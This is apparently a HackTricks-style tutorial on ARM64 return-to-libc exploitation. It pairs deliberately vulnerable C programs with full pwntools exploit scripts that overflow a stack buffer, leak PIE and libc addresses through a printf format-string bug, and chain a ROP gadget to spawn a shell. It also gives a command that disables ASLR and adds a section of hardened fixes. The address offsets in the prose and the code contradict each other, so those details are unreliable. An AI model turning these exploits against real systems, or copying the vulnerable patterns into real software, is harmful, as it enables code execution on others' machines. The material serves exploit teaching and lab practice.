Ret2lib + Printf leak - ARM64
Ret2lib - NX bypass with ROP (no ASLR)
```c
#include <stdio.h>

void bof()
{
    char buf[100];
    printf("\nbof>\n");
    fgets(buf, sizeof(buf)*3, stdin); // reads up to 300 bytes into a 100-byte stack buffer
}

void main()
{
    bof();
}
```
Build without a canary:

```bash
clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```
Find the offset - x30 offset
By creating a pattern with `pattern create 200`, feeding it to the program, and checking the offset with `pattern search $x30`, we can see that the offset is 108 (0x6c).
Looking at the disassembled main function, we can see that we would want to jump to the instruction that calls printf directly, whose offset from where the binary is loaded is 0x860:
Find system and the /bin/sh string
Since ASLR is disabled, the addresses will always be the same:
Find Gadgets
We need to have the address of the /bin/sh string in x0 and then call system.
Using rooper, an interesting gadget was found:

```
0x000000000006bdf0: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
```

This gadget loads x0 from $sp + 0x18, then loads x29 and x30 from sp and jumps to x30. So with this gadget we can control the first argument and then jump to system.
Exploit
```python
from pwn import *

p = process('./rop-no-aslr')  # Local binary built above
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000  # Fixed libc base, ASLR is disabled

binsh = next(libc.search(b"/bin/sh"))  # Verify with `find /bin/sh` in the debugger
system = libc.sym["system"]

def expl_bof(payload):
    p.recv()  # consume the "bof>" prompt
    p.sendline(payload)

# Ret2system
stack_offset = 108  # bytes from the start of buf to the saved x30
ldr_x0_ret = p64(libc.address + 0x6bdf0)  # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x18 - 0x10)  # pad so that [sp, #0x18] points at x0
x0 = p64(binsh)

payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
expl_bof(payload)

p.interactive()
p.close()
```
Ret2lib - NX, ASLR & PIE bypass with printf leaks from the stack
```c
#include <stdio.h>

void printfleak()
{
    char buf[100];
    printf("\nPrintf>\n");
    fgets(buf, sizeof(buf), stdin);
    printf(buf); // user input used as the format string
}

void bof()
{
    char buf[100];
    printf("\nbof>\n");
    fgets(buf, sizeof(buf)*3, stdin); // reads up to 300 bytes into a 100-byte stack buffer
}

void main()
{
    printfleak();
    bof();
}
```
Build without a canary:

```bash
clang -o rop rop.c -fno-stack-protector -Wno-format-security
```
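The two defects in the source above, the format-string call `printf(buf)` in printfleak() and the oversized length passed to fgets() in bof(), beside their fixed forms. This is an added example written for this page, not code from HackTricks or the page's author; the function names (read_line_bounded, has_format_directive, echo_safely, bounded_read_len, overflow_attempt_len) and the sample inputs are my own. The helper functions return the values a test can check: a 300-byte line fed to the hardened reader with a 100-byte buffer stores 99 bytes instead of overwriting the saved x29/x30, and the `%21$p` / `%25$p` probes are recognised as format directives but printed literally.

```c
#include <stdio.h>
#include <string.h>

/* bof() fix: the length handed to fgets() is the real buffer size.
 * Reads one line into buf (at most bufsize - 1 bytes plus NUL), strips the
 * trailing newline, and drains the rest of an over-long line so the leftover
 * bytes are not consumed by the next read. Returns the number of bytes stored,
 * or -1 on EOF/error. */
int read_line_bounded(char *buf, size_t bufsize, FILE *in)
{
    if (bufsize == 0 || fgets(buf, (int)bufsize, in) == NULL)
        return -1;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';
    } else if (n == bufsize - 1) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)n;
}

/* Returns 1 if s contains a printf conversion ("%p", "%21$p", ...), 0 if it is
 * plain text or only contains "%%" escapes. A detection check for input that
 * reaches a logging path; it complements, but does not replace, echo_safely(). */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') { /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* printfleak() fix: user data is an argument to a fixed format string, so
 * "%21$p" in the input is printed literally instead of reading the stack.
 * Returns the number of characters written. */
int echo_safely(const char *user, FILE *out)
{
    return fprintf(out, "%s\n", user);
}

/* Test helper: run read_line_bounded over a temporary stream holding `text`
 * (constructed input) with a buffer of `bufsize` bytes and return how many
 * bytes were stored. tmpfile() is used so no feature macros are needed. */
int bounded_read_len(const char *text, size_t bufsize)
{
    char buf[256];
    if (bufsize > sizeof buf)
        bufsize = sizeof buf;
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fputs(text, in);
    rewind(in);
    int n = read_line_bounded(buf, bufsize, in);
    fclose(in);
    return n;
}

/* Test helper: the page's overflow attempt, a line three times the size of the
 * 100-byte buffer, constructed in memory. With the fixed reader it yields 99. */
int overflow_attempt_len(void)
{
    char line[302];
    memset(line, 'A', 300);
    line[300] = '\n';
    line[301] = '\0';
    return bounded_read_len(line, 100);
}

int main(void)
{
    char buf[100];
    printf("\nPrintf>\n");
    if (read_line_bounded(buf, sizeof buf, stdin) >= 0) {
        if (has_format_directive(buf))
            fprintf(stderr, "note: input contains format directives\n");
        echo_safely(buf, stdout);
    }
    return 0;
}
```

Build this version without the flags that disable the mitigations the page is bypassing, i.e. drop `-fno-stack-protector` and `-Wno-format-security` and compile with `-fstack-protector-strong -Werror=format-security -D_FORTIFY_SOURCE=2 -fPIE -pie`, with ASLR left at its default of 2 in /proc/sys/kernel/randomize_va_space; `-Werror=format-security` alone would have refused to compile the original `printf(buf)`.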
PIE and ASLR, but no canary
- Round 1:
  - Leak PIE from the stack
  - Abuse bof to return to main
- Round 2:
  - Leak libc from the stack
  - ROP: ret2system
Printf leaks
Setting a breakpoint before the call to printf, it's possible to see that there are return addresses into the binary on the stack, as well as libc addresses:
Trying different offsets, `%21$p` can leak an address of the binary (PIE bypass) and `%25$p` can leak an address of libc:
Subtracting the libc base address from the leaked libc address, it's possible to see that the offset of the leaked address from the base is 0x49c40.
x30 offset
See the previous example, as the bof is the same.
Find Gadgets
As in the previous example, we need to have the address of the /bin/sh string in x0 and then call system.
Using rooper, another interesting gadget was found:

```
0x0000000000049c40: ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
```

This gadget loads x0 from $sp + 0x78, then loads x29 and x30 from sp and jumps to x30. So with this gadget we can control the first argument and then jump to system.
Exploit
```python
from pwn import *

p = process('./rop')  # Local binary built above
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")

def leak_printf(payload, is_main_addr=False):
    """Send a format string to printfleak() and parse the address it prints."""
    p.sendlineafter(b">\n", payload)
    response = p.recvline().strip()[2:]  # Remove newline and "0x" prefix
    if is_main_addr:
        response = response[:-4] + b"0000"  # Clear the low 16 bits to get the 64 KiB-aligned binary base
    return int(response, 16)

def expl_bof(payload):
    p.recv()  # consume the "bof>" prompt
    p.sendline(payload)

# Round 1: leak a binary address to get the PIE base
main_address = leak_printf(b"%21$p", True)
print(f"Bin address: {hex(main_address)}")

# Ret2main: make bof() return to the call of printfleak() inside main
stack_offset = 108
main_call_printf_offset = 0x860  # Offset inside main of the call to printfleak
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
ret2main = b"A"*stack_offset + p64(main_address + main_call_printf_offset)
expl_bof(ret2main)

# Round 2: leak a libc address and subtract its offset from the libc base (measured in the debugger)
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
libc.address = libc_base_address
print(f"Libc address: {hex(libc_base_address)}")
binsh = next(libc.search(b"/bin/sh"))
system = libc.sym["system"]

# ret2system
ldr_x0_ret = p64(libc.address + 0x49c40)  # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x78 - 0x10)  # pad so that [sp, #0x78] points at x0
x0 = p64(binsh)

payload = b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
expl_bof(payload)

p.interactive()
```